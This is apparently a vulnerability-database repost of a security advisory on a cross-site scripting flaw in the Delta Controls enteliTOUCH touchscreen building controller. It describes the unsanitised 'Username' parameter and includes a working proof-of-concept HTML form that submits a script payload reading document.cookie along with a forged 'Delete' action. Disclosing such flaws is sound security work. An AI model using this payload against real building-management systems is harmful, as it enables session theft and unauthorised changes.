Delta Controls enteliTOUCH 3.40.3935 Cross Site Scripting

Credit: LiquidWorm
Risk: Low
Local: No
Remote: Yes

<!DOCTYPE html> <html> <head><title>enteliTouch XSS</title></head> <body> <!-- Delta Controls enteliTOUCH 3.40.3935 Cross-Site Scripting (XSS) Vendor: Delta Controls Inc. Product web page: Affected version: 3.40.3935 3.40.3706 3.33.4005 Summary: enteliTOUCH - Touchscreen Building Controller. Get instant access to the heart of your BAS. The enteliTOUCH has a 7-inch, high-resolution display that serves as an interface to your building. Use it as your primary interface for smaller facilities or as an on-the-spot access point for larger systems. The intuitive, easy-to-navigate interface gives instant access to manage your BAS. Desc: Input passed to the POST parameter 'Username' is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML code in a user's browser session in context of an affected site. Tested on: DELTA enteliTOUCH Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5703 Advisory URL: 06.04.2022 --> <form action="" method="POST"> <input type="hidden" name="userInfo" value="" /> <input type="hidden" name="UL&#95;SelectedOptionId" value="" /> <input type="hidden" name="Username" value="&quot;&gt;&lt;&#47;script&gt;&lt;script&gt;alert&#40;document&#46;cookie&#41;&lt;&#47;script&gt;" /> <input type="hidden" name="formAction" value="Delete" /> <input type="submit" value="CSRF XSS Alert!" /> </form> </body> </html>

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022,


Back to Top